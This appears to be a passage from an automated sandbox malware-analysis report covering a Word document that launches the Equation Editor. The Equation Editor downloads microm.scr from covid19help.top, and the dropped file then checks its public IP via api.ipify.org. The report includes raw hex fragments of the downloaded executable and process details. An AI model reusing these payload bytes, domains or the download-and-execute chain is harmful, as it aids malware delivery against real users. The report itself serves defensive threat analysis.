Apr 26, 2024 03:05:50.401370049 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.403449059 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.403534889 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.403578043 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.403640985 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.406102896 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.406183004 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.406230927 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.406332016 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.406332016 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.408036947 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.408137083 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.408184052 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.408257961 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.408389091 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.410722017 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.410804033 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.410851955 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.410921097 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.412960052 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.413022041 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.413086891 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.413155079 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.413346052 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.415517092 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.415590048 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.415674925 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.415739059 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.417574883 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.417649031 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.417700052 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.417773008 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.418431044 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.420392036 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.420484066 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.420521975 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.420583963 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.421417952 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.422363043 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.422434092 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.422488928 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.422558069 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.425048113 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.425147057 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.425173044 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.425240040 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.427190065 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.427278042 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.427349091 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.427436113 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.428376913 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.429980993 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.430062056 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.430110931 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.430196047 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.432461023 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.432548046 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.432601929 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.432668924 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.434678078 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.434753895 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.434825897 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.434896946 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.437601089 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.437674999 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.437728882 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.437792063 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.439227104 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.439294100 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.439354897 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.439414978 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.442008018 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.442089081 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.442136049 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.442197084 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.443984032 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.444056034 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.444129944 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.444190025 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.446774960 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.446856022 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.446901083 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.446968079 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.497431040 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.497524977 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.497580051 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.497651100 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.499195099 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.499293089 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.499387980 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.499442101 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.514383078 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.514460087 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.514477015 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.514538050 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.514600992 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.514655113 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.514748096 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.514796019 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.514808893 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.514838934 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:51.676476955 CEST	49162	443	192.168.2.22	172.67.74.152
Apr 26, 2024 03:05:51.676507950 CEST	443	49162	172.67.74.152	192.168.2.22
Apr 26, 2024 03:05:51.677932024 CEST	49162	443	192.168.2.22	172.67.74.152
Apr 26, 2024 03:05:51.686052084 CEST	49162	443	192.168.2.22	172.67.74.152
Apr 26, 2024 03:05:51.686062098 CEST	443	49162	172.67.74.152	192.168.2.22
Apr 26, 2024 03:05:51.959042072 CEST	443	49162	172.67.74.152	192.168.2.22
Apr 26, 2024 03:05:51.959158897 CEST	49162	443	192.168.2.22	172.67.74.152
Apr 26, 2024 03:05:52.028162956 CEST	49162	443	192.168.2.22	172.67.74.152
Apr 26, 2024 03:05:52.028175116 CEST	443	49162	172.67.74.152	192.168.2.22
Apr 26, 2024 03:05:52.029382944 CEST	443	49162	172.67.74.152	192.168.2.22
Apr 26, 2024 03:05:52.236169100 CEST	443	49162	172.67.74.152	192.168.2.22
Apr 26, 2024 03:05:52.236269951 CEST	49162	443	192.168.2.22	172.67.74.152
Apr 26, 2024 03:05:52.307372093 CEST	49162	443	192.168.2.22	172.67.74.152
Apr 26, 2024 03:05:52.352114916 CEST	443	49162	172.67.74.152	192.168.2.22
Apr 26, 2024 03:05:52.477550983 CEST	443	49162	172.67.74.152	192.168.2.22
Apr 26, 2024 03:05:52.477725983 CEST	443	49162	172.67.74.152	192.168.2.22
Apr 26, 2024 03:05:52.477781057 CEST	49162	443	192.168.2.22	172.67.74.152
Apr 26, 2024 03:05:52.515562057 CEST	49162	443	192.168.2.22	172.67.74.152

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 03:05:48.587985992 CEST	54562	53	192.168.2.22	8.8.8.8
Apr 26, 2024 03:05:48.788902044 CEST	53	54562	8.8.8.8	192.168.2.22
Apr 26, 2024 03:05:51.500503063 CEST	52917	53	192.168.2.22	8.8.8.8
Apr 26, 2024 03:05:51.662383080 CEST	53	52917	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 03:05:48.587985992 CEST	192.168.2.22	8.8.8.8	0xea0d	Standard query (0)	covid19help.top	A (IP address)	IN (0x0001)	false
Apr 26, 2024 03:05:51.500503063 CEST	192.168.2.22	8.8.8.8	0xd734	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 03:05:48.788902044 CEST	8.8.8.8	192.168.2.22	0xea0d	No error (0)	covid19help.top	104.21.83.128	A (IP address)	IN (0x0001)	false
Apr 26, 2024 03:05:48.788902044 CEST	8.8.8.8	192.168.2.22	0xea0d	No error (0)	covid19help.top	172.67.175.222	A (IP address)	IN (0x0001)	false
Apr 26, 2024 03:05:51.662383080 CEST	8.8.8.8	192.168.2.22	0xd734	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Apr 26, 2024 03:05:51.662383080 CEST	8.8.8.8	192.168.2.22	0xd734	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Apr 26, 2024 03:05:51.662383080 CEST	8.8.8.8	192.168.2.22	0xd734	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

covid19help.top

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	104.21.83.128	443	2452	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
2024-04-26 01:05:49 UTC	312	OUT	GET /microm.scr HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: covid19help.top Connection: Keep-Alive
2024-04-26 01:05:49 UTC	771	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 01:05:49 GMT Content-Type: application/x-silverlight Content-Length: 857600 Connection: close Last-Modified: Thu, 25 Apr 2024 07:52:56 GMT ETag: "d1600-616e7133f4613" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x9fkQB%2BDqWVzHqMOjWhL%2BVK22N6HGqoLrvX9Cw4Sh5YVIbTlB%2BJILNR4Cy3i255htcLk5v4L8ISQxMqMu3IZVXGfZK6%2BzlNU33fCvo1K9qdDqD%2Flc4xAzBPipWN8zCtW76g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; includeSubDomains; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 87a2aaab2e6925a3-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 01:05:49 UTC	598	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 32 d9 f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 0a 0d 00 00 0a 00 00 00 00 00 00 ae 28 0d 00 00 20 00 00 00 40 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL20( @@ @
2024-04-26 01:05:49 UTC	1369	IN	Data Raw: 33 00 34 00 35 00 36 00 37 00 38 00 39 00 00 00 00 00 57 43 46 00 00 00 00 00 4b 65 72 62 65 72 6f 73 2a 86 48 86 f7 12 01 02 02 00 00 00 26 02 28 31 00 00 0a 00 00 2a 22 00 02 80 02 00 00 04 2a 4a 00 7e 06 00 00 04 74 a6 00 00 01 28 36 00 00 0a 26 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 07 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 1e 02 7b 08 00 00 04 2a 22 02 03 7d 08 00 00 04 2a 1e 02 7b 09 00 00 04 2a 22 02 03 7d 09 00 00 04 2a 1e 02 7b 0a 00 00 04 2a 22 02 03 7d 0a 00 00 04 2a 1e 02 7b 0b 00 00 04 2a 22 02 03 7d 0b 00 00 04 2a 22 02 28 31 00 00 0a 00 2a b2 28 05 00 00 06 80 03 00 00 04 28 37 00 00 0a 7e 03 00 00 04 28 1b 00 00 06 6f 38 00 00 0a 6f 39 00 00 0a 1f 23 9a 80 06 00 00 Data Ascii: 3456789WCFKerberosH&(1"J~t(6&{"}{"}{"}{"}{"}{"}{"}"(1*((7~(o8o9#
2024-04-26 01:05:49 UTC	1369	IN	Data Raw: 2a 1e 02 7b f3 01 00 04 2a 52 02 03 7d f3 01 00 04 02 03 28 be 00 00 06 7d f4 01 00 04 2a 36 02 28 b6 00 00 06 14 fe 01 16 fe 01 2a 1e 02 7b f4 01 00 04 2a 1e 02 28 c0 00 00 06 2a 1a 7e f8 01 00 04 2a 2e 73 c1 00 00 06 80 f8 01 00 04 2a 1e 02 28 c1 00 00 06 2a 1a 7e f9 01 00 04 2a 96 03 28 57 03 00 06 7b f6 04 00 04 6f ab 00 00 0a 28 9b 00 00 0a 2c 06 73 a8 00 00 06 2a 02 03 28 c3 00 00 06 2a 2e 73 c5 00 00 06 80 f9 01 00 04 2a 86 02 28 be 00 00 0a 03 2d 10 28 39 00 00 06 72 1d 0c 00 70 6f 5c 00 00 0a 7a 02 03 28 d6 00 00 06 2a 0a 17 2a 1e 02 7b fa 01 00 04 2a 1e 02 7b fb 01 00 04 2a 42 28 39 00 00 06 73 bf 00 00 0a 6f 5e 00 00 0a 7a 06 2a b2 02 7b fa 01 00 04 28 81 00 00 06 16 16 6f c0 00 00 0a 26 28 b0 03 00 06 2c 11 02 7b fd 01 00 04 02 7b fa 01 00 04 Data Ascii: {R}(}6({(~.s(~(W{o(,s(.s(-(9rpo\z({{B(9so^z{(o&(,{{
2024-04-26 01:05:49 UTC	1369	IN	Data Raw: ef 02 00 04 03 28 80 02 00 06 2a 6a 02 7b f0 02 00 04 2d 0b 02 73 19 02 00 06 7d f0 02 00 04 02 7b f0 02 00 04 2a 22 02 03 7d f0 02 00 04 2a 32 02 7b ed 02 00 04 6f b6 00 00 06 2a 3a 02 7b ed 02 00 04 03 04 6f a6 00 00 06 2a 3a 02 7c ef 02 00 04 03 04 28 81 02 00 06 2a 3a 02 7b ed 02 00 04 03 04 6f a7 00 00 06 2a 3a 02 7c ef 02 00 04 03 04 28 82 02 00 06 2a 52 02 03 28 24 01 00 06 02 1e 8d 48 00 00 02 7d fb 02 00 04 2a 1e 02 7b f7 02 00 04 2a 22 02 03 7d f7 02 00 04 2a 1e 02 7b f9 02 00 04 2a 22 02 03 7d f9 02 00 04 2a 1e 02 7b f8 02 00 04 2a 2a 02 03 04 16 28 52 01 00 06 2a ca 05 2c 19 03 28 e9 00 00 0a 2c 11 28 39 00 00 06 03 73 a8 00 00 0a 6f 5e 00 00 0a 7a 02 03 7d fc 02 00 04 02 04 7d fd 02 00 04 02 05 7d fe 02 00 04 2a 1a 7e 13 03 00 04 2a d2 03 72 Data Ascii: (j{-s}{"}2{o:{o:\|(:{o:\|(R($H}{"}{"}{(R,(,(9so^z}}}~r
2024-04-26 01:05:49 UTC	1369	IN	Data Raw: 03 00 04 03 04 05 6f 31 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f 32 01 00 0a 2a 3e 02 7b 3c 03 00 04 03 04 05 6f 33 01 00 0a 2a 3e 02 7b 3c 03 00 04 03 04 05 6f 34 01 00 0a 2a 32 02 7b 3c 03 00 04 6f 35 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f 36 01 00 0a 2a 76 02 25 7b 38 03 00 04 17 58 7d 38 03 00 04 02 7b 3c 03 00 04 03 04 05 6f e7 00 00 0a 2a 76 02 25 7b 38 03 00 04 17 58 7d 38 03 00 04 02 7b 3c 03 00 04 03 04 05 6f ae 00 00 0a 2a 32 02 7b 3c 03 00 04 6f 37 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f ba 00 00 0a 2a 36 02 7b 3c 03 00 04 03 6f b9 00 00 0a 2a 3a 02 7b 3c 03 00 04 03 04 6f 38 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f 39 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f 3a 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f 3b 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f 3c 01 00 Data Ascii: o16{<o2>{<o3>{<o42{<o56{<o6v%{8X}8{<ov%{8X}8{<o2{<o76{<o6{<o:{<o86{<o96{<o:6{<o;*6{<o<
2024-04-26 01:05:49 UTC	1369	IN	Data Raw: 4e 02 28 20 02 00 06 6f 35 02 00 06 03 04 6f 41 01 00 06 2a 32 02 28 20 02 00 06 6f 37 02 00 06 2a 36 02 03 28 96 01 00 0a 28 2a 02 00 06 2a 4e 02 7b 68 03 00 04 03 02 7b 6a 03 00 04 6f 38 02 00 06 2a fe 02 28 20 02 00 06 6f 35 02 00 06 03 6f 3b 01 00 06 03 6f b0 00 00 0a 02 28 28 02 00 06 28 98 00 00 06 2d 1a 28 39 00 00 06 72 eb 2b 00 70 28 35 00 00 06 73 ad 00 00 0a 6f 5e 00 00 0a 7a 2a ee 02 28 20 02 00 06 6f 35 02 00 06 03 6f 3b 01 00 06 04 03 02 28 28 02 00 06 6f 97 01 00 0a 2d 1a 28 39 00 00 06 72 eb 2b 00 70 28 35 00 00 06 73 ad 00 00 0a 6f 5e 00 00 0a 7a 2a 3a 02 03 02 7b 6a 03 00 04 28 2f 02 00 06 2a 3a 02 7b 68 03 00 04 03 04 6f 3a 02 00 06 2a ae 02 72 ac 09 00 70 7d 6e 03 00 04 02 73 43 02 00 06 7d 6f 03 00 04 02 28 41 00 00 0a 02 03 7d 6b 03 Data Ascii: N( o5oA2( o76((*N{h{jo8( o5o;o(((-(9r+p(5so^z( o5o;((o-(9r+p(5so^z:{j(/:{ho:rp}nsC}o(A}k
2024-04-26 01:05:49 UTC	1369	IN	Data Raw: 00 04 fe 15 71 00 00 02 2a 5a 02 28 ae 01 00 0a 2d 0c 02 7c 1d 04 00 04 28 8d 02 00 06 2a 17 2a 8a 02 7b 1e 04 00 04 2c 0b 02 7b 1e 04 00 04 6f 03 01 00 0a 02 7c 1d 04 00 04 28 9d 02 00 06 16 fe 01 2a 66 02 7e 8e 00 00 0a 17 28 ad 01 00 0a 02 7c 20 04 00 04 fe 15 71 00 00 02 2a 5a 02 28 ae 01 00 0a 2d 0c 02 7c 20 04 00 04 28 8d 02 00 06 2a 17 2a 3e 02 7c 20 04 00 04 28 ab 02 00 06 16 fe 01 2a 22 02 03 7d 91 00 00 0a 2a 32 02 7b 91 00 00 0a 28 ae 02 00 06 2a 1a 73 b0 02 00 06 2a 3e 02 7b 91 00 00 0a 28 b8 02 00 06 16 fe 01 2a 3e 02 04 28 8f 00 00 0a 02 03 28 90 00 00 0a 2a 32 02 7b 91 00 00 0a 28 bc 02 00 06 2a 32 02 7b 91 00 00 0a 28 bf 02 00 06 2a 36 02 7b 91 00 00 0a 28 ba 01 00 0a 17 2a 2e 7e 8e 00 00 0a 73 c1 02 00 06 2a 1e 02 28 c7 02 00 06 2a 2e 7e Data Ascii: qZ(-\|({,{o\|(f~(\| qZ(-\| (>\| ("}2{(s>{(>((2{(2{(6{(.~s(.~
2024-04-26 01:05:49 UTC	1369	IN	Data Raw: 2f 03 00 06 2a 2e 02 03 04 05 16 28 2f 03 00 06 2a a2 02 7b 80 04 00 04 2d 11 02 02 6f e4 01 00 0a 73 f7 01 00 0a 7d 80 04 00 04 02 7b 80 04 00 04 03 04 05 6f f8 01 00 0a 2a 32 02 7b 7d 04 00 04 6f fa 01 00 0a 2a da 02 28 41 00 00 0a 03 17 2f 1f 28 39 00 00 06 72 2d 31 00 70 72 bf 24 00 70 28 35 00 00 06 73 5d 00 00 0a 6f 5e 00 00 0a 7a 02 03 8d 8e 00 00 02 7d 85 04 00 04 2a 1e 02 7b 84 04 00 04 2a 1e 02 7b 83 04 00 04 2a 5e 02 7b 85 04 00 04 02 7b 83 04 00 04 8f 8e 00 00 02 7b 88 04 00 04 2a 5e 02 7b 85 04 00 04 02 7b 83 04 00 04 8f 8e 00 00 02 28 4c 03 00 06 2a 5e 02 7b 85 04 00 04 02 7b 83 04 00 04 8f 8e 00 00 02 7b 89 04 00 04 2a 5e 02 7b 85 04 00 04 02 7b 83 04 00 04 8f 8e 00 00 02 7b 8a 04 00 04 2a 5e 02 7b 85 04 00 04 02 7b 83 04 00 04 8f 8e 00 00 Data Ascii: /.(/{-os}{o2{}o(A/(9r-1pr$p(5s]o^z}{{^{{{^{{(L^{{{^{{{*^{{
2024-04-26 01:05:49 UTC	1369	IN	Data Raw: 2d 02 17 7d 9e 05 00 04 02 7b 9c 05 00 04 75 40 00 00 01 28 00 02 00 06 02 7b 99 05 00 04 28 fc 01 00 06 02 7b 9a 05 00 04 28 fd 01 00 06 2a 92 02 7b 9e 05 00 04 2c 1b 28 39 00 00 06 02 28 42 00 00 0a 6f 04 02 00 0a 73 05 02 00 0a 6f 5e 00 00 0a 7a 2a 2e 02 03 14 04 05 28 ac 03 00 06 2a c6 02 28 0d 02 00 0a 03 28 e9 00 00 0a 2c 0d 02 72 51 32 00 70 7d ac 05 00 04 2b 07 02 03 7d ac 05 00 04 02 04 7d aa 05 00 04 02 05 7d ab 05 00 04 2a 5a 72 5d 32 00 70 02 7b ac 05 00 04 72 c3 32 00 70 28 50 01 00 0a 2a 4a 7e af 05 00 04 2d 05 28 b1 03 00 06 7e ae 05 00 04 2a e2 28 38 00 00 06 2c 2a 28 38 00 00 06 6f 14 02 00 0a 2c 1e 28 38 00 00 06 6f 14 02 00 0a 6f 15 02 00 0a 2c 0d 28 46 00 00 06 2c 06 17 80 ae 05 00 04 17 80 af 05 00 04 2a 8a 28 b0 03 00 06 2c 1a 1f 10 Data Ascii: -}{u@({({({,(9(Boso^z.(((,rQ2p}+}}}Zr]2p{r2p(PJ~-(~(8,(8o,(8oo,(F,(,
2024-04-26 01:05:49 UTC	1369	IN	Data Raw: 1a 72 b0 3a 00 70 2a 1a 72 24 3b 00 70 2a 1a 72 98 3b 00 70 2a 1a 72 31 3c 00 70 2a 1a 72 bc 3c 00 70 2a 1a 72 47 3d 00 70 2a 1a 72 e0 3d 00 70 2a 1a 72 60 3e 00 70 2a 1a 72 dc 3e 00 70 2a 1a 72 65 3f 00 70 2a 1a 72 e3 3f 00 70 2a 1a 72 70 40 00 70 2a 1a 72 f3 40 00 70 2a 1a 72 6f 41 00 70 2a 1a 72 ef 41 00 70 2a 1a 72 72 42 00 70 2a 1a 72 f7 42 00 70 2a 1a 72 7c 43 00 70 2a 1a 72 f6 43 00 70 2a 1a 72 97 44 00 70 2a 3e 02 28 f1 03 00 06 02 02 03 28 1b 04 00 06 2a 3e 02 28 f1 03 00 06 02 03 04 28 1b 04 00 06 2a 36 02 7b e2 05 00 04 03 6f 2e 02 00 0a 2a 32 02 7b e2 05 00 04 6f 2f 02 00 0a 2a 1e 02 7b e1 05 00 04 2a 32 02 7b e2 05 00 04 6f 06 00 00 0a 2a d6 03 2d 10 28 39 00 00 06 72 13 45 00 70 6f 5c 00 00 0a 7a 04 2d 10 28 39 00 00 06 72 21 45 00 70 6f 5c Data Ascii: r:pr$;pr;pr1<pr<prG=pr=pr`>pr>pre?pr?prp@pr@proAprAprrBprBpr\|CprCprDp>((>((6{o.2{o/{2{o-(9rEpo\z-(9r!Epo\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49162	172.67.74.152	443	3204	C:\Users\user\AppData\Roaming\microme09255.scr

Timestamp	Bytes transferred	Direction	Data
2024-04-26 01:05:52 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-04-26 01:05:52 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 01:05:52 GMT Content-Type: text/plain Content-Length: 15 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 87a2aabe4ee931d7-MIA
2024-04-26 01:05:52 UTC	15	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 Data Ascii: 102.129.152.220

Target ID:	0
Start time:	03:05:45
Start date:	26/04/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13ffe0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	03:05:46
Start date:	26/04/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:05:50
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Roaming\microme09255.scr
Wow64 process (32bit):	true
